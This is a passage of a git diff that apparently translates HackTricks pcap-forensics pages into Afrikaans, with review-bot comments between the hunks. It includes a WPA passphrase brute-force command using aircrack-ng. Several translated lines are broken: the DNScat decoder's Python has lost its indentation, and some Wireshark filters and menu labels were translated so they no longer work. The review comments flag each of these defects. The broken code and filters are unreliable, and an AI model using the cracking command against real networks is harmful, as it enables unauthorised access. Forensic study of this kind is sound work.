Dit kan help om verdagte aktiwiteite, soos die besoek van skadelike webwerwe of die kommunikasie met verdagte IP-adresse, te identifiseer. + +Deur die inspeksie van DNS-inligting in 'n PCAP, kan jy waardevolle insigte verkry oor die aktiwiteite van 'n rekenaar of netwerk en dit gebruik vir forensiese analise. ```bash #Get info about each DNS request performed cat dns.log | zeek-cut -c id.orig_h query qtype_name answers @@ -234,8 +290,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr #See top DNS domain requested with rita rita show-exploded-dns -H --limit 10 zeek_logs ``` - -## Other pcap analysis tricks +## Ander pcap-analise-truuks {% content-ref url="dnscat-exfiltration.md" %} [dnscat-exfiltration.md](dnscat-exfiltration.md) @@ -253,20 +308,20 @@ rita show-exploded-dns -H --limit 10 zeek_logs
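Review bot: The "### DNS-inligting" hunk replaces a heading-only section with five invented subsections ("#### DNS-navrae" through "#### DNS-tydskrif-analise") that do not exist in the English source; a translation PR should not add content, so remove everything between "### DNS-inligting" and the bash fence. Also "tydskrif" means magazine, not log; the same PR already uses "logboek" in the Zeek paragraph, so if any of this prose is kept it should say "DNS-logboeke".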
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index ca2eda85f..e644197e8 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -1,65 +1,57 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content. - -You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**: +As jy 'n pcap het met data wat **deur DNSCat uitgelekte word** (sonder om versleuteling te gebruik), kan jy die uitgelekte inhoud vind. +Jy hoef net te weet dat die **eerste 9 byte** nie werklike data is nie, maar verband hou met die **C\&C-kommunikasie**: ```python from scapy.all import rdpcap, DNSQR, DNSRR -import struct +import struct f = "" last = "" for p in rdpcap('ch21.pcap'): - if p.haslayer(DNSQR) and not p.haslayer(DNSRR): +if p.haslayer(DNSQR) and not p.haslayer(DNSRR): - qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".") - qry = ''.join(_.decode('hex') for _ in qry)[9:] - if last != qry: - print(qry) - f += qry - last = qry +qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".") +qry = ''.join(_.decode('hex') for _ in qry)[9:] +if last != qry: +print(qry) +f += qry +last = qry #print(f) ``` - -For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\ +Vir meer inligting: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\ [https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md) -There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) - +Daar is 'n skripsie wat met Python3 werk: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) ``` python3 dnscat_decoder.py sample.pcap bad_domain ``` -
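Review bot: The Python block in this hunk is broken by the translation: every `+` line inside the `for` loop lost its indentation (`if p.haslayer(DNSQR) and not p.haslayer(DNSRR):` and the following `qry = ...`, `if last != qry:` and `print(qry)` lines all start at column 0), so the script now raises IndentationError instead of decoding anything. Restore the original indentation and leave code lines untouched in translation commits. In the prose, "uitgelekte word" should be "uitgelek word", and "skripsie" means thesis; "skrip" is the term for a script.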
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index ec70883d9..b0e789844 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -1,27 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-If you have a pcap of a USB connection with a lot of Interruptions probably it is a USB Keyboard connection. +As jy 'n pcap het van 'n USB-verbinding met baie onderbrekings, is dit waarskynlik 'n USB-toetsbordverbinding. -A wireshark filter like this could be useful: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` +'n Wireshark-filter soos hierdie kan nuttig wees: `usb.transfer_type == 0x01 en frame.len == 35 en !(usb.capdata == 00:00:00:00:00:00:00:00)` -It could be important to know that the data that starts with "02" is pressed using shift. +Dit kan belangrik wees om te weet dat die data wat met "02" begin, gedruk word deur die Shift-knoppie. -You can read more information and find some scripts about how to analyse this in: +Jy kan meer inligting lees en sommige skripte vind oor hoe om dit te analiseer in: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) @@ -30,16 +28,14 @@ You can read more information and find some scripts about how to analyse this in
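Review bot: The Wireshark display filter in this hunk was translated and no longer parses: `usb.transfer_type == 0x01 en frame.len == 35 en !(usb.capdata == 00:00:00:00:00:00:00:00)` replaces the operator `and` with Afrikaans `en`, which Wireshark does not recognise. Keep filter expressions inside backticks verbatim (`and` or `&&`) and translate only the surrounding sentence.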
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 8168fa14d..67e8876cd 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -1,34 +1,28 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-If you have a pcap containing the communication via USB of a keyboard like the following one: +As jy 'n pcap het wat die kommunikasie via USB van 'n sleutelbord bevat, soos die volgende een: ![](<../../../.gitbook/assets/image (613).png>) -You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) to get what was written in the communication: - +Jy kan die instrument [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) gebruik om te sien wat in die kommunikasie geskryf is: ```bash tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt ``` - - - -You can read more information and find some scripts about how to analyse this in: +Jy kan meer inligting lees en sommige skripte vind oor hoe om dit te analiseer in: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) @@ -36,16 +30,14 @@ You can read more information and find some scripts about how to analyse this in
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 51a053801..f6dd9e3fe 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -1,23 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Check BSSIDs +# Kontroleer BSSIDs -When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_: +Wanneer jy 'n vangste ontvang waarvan die hoofverkeer Wifi is en jy gebruik WireShark, kan jy begin ondersoek instel na al die SSIDs van die vangste met _Wireless --> WLAN Traffic_: ![](<../../../.gitbook/assets/image (424).png>) 
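Review bot: "'n vangste" pairs the article with a plural noun; the sentence describes a single capture, so "'n vangs ... van die vangs" reads correctly. The menu path _Wireless --> WLAN Traffic_ was rightly left in English, since those are Wireshark's UI labels.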
@@ -25,31 +23,29 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c ## Brute Force -One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`: - +Een van die kolomme van daardie skerm dui aan of **enige outentifikasie binne die pcap gevind is**. As dit die geval is, kan jy probeer om dit te Brute force deur `aircrack-ng` te gebruik: ```bash aircrack-ng -w pwds-file.txt -b file.pcap ``` +Byvoorbeeld, dit sal die WPA-wagwoord herwin wat 'n PSK (vooraf gedeelde sleutel) beskerm, wat later nodig sal wees om die verkeer te ontsleutel. -For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later. +# Data in Beacons / Sykanaal -# Data in Beacons / Side Channel +As jy vermoed dat **data binne beacons van 'n WiFi-netwerk uitgelek word**, kan jy die beacons van die netwerk ondersoek deur 'n filter soos die volgende te gebruik: `wlan bevat `, of `wlan.ssid == "NAAMvanNETWERK"` soek binne die gefiltreerde pakkies vir verdagte strings. -If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings. 
+# Vind Onbekende MAC-adresse in 'n WiFi-netwerk -# Find Unknown MAC Addresses in A Wifi Network - -The following link will be useful to find the **machines sending data inside a Wifi Network**: +Die volgende skakel sal nuttig wees om die **toestelle wat data binne 'n WiFi-netwerk stuur** te vind: * `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` -If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)` +As jy reeds **MAC-adresse ken, kan jy dit uit die uitset verwyder** deur kontroles soos hierdie een by te voeg: `&& !(wlan.addr==5c:51:88:31:a0:3b)` -Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr== && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic. +Nadat jy **onbekende MAC-adresse wat binne die netwerk kommunikeer, opgespoor het**, kan jy **filters** soos die volgende een gebruik: `wlan.addr== && (ftp || http || ssh || telnet)` om die verkeer te filtreer. Let daarop dat ftp/http/ssh/telnet-filters nuttig is as jy die verkeer ontsluit het. -# Decrypt Traffic +# Ontsleutel Verkeer -Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit +Wysig --> Voorkeure --> Protokolle --> IEEE 802.11 --> Wysig ![](<../../../.gitbook/assets/image (426).png>) @@ -59,16 +55,14 @@ Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
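Review bot: Two filter and UI strings in this hunk were translated and will not work as written: `wlan bevat ` replaces the Wireshark operator `contains` (the filter must stay `wlan contains `), and the menu path "Wysig --> Voorkeure --> Protokolle --> IEEE 802.11 --> Wysig" translates labels that Wireshark shows in English ("Edit --> Preferences --> Protocols --> IEEE 802.11 --> Edit"), so readers cannot locate them. Keep filter syntax and menu labels verbatim; translating the SSID placeholder to "NAAMvanNETWERK" is fine, since it is user-supplied.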
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 1b34fb3ca..c9acaa3af 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -1,183 +1,181 @@ -# Wireshark tricks +# Wireshark-truuks -## Wireshark tricks +## Wireshark-truuks
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek 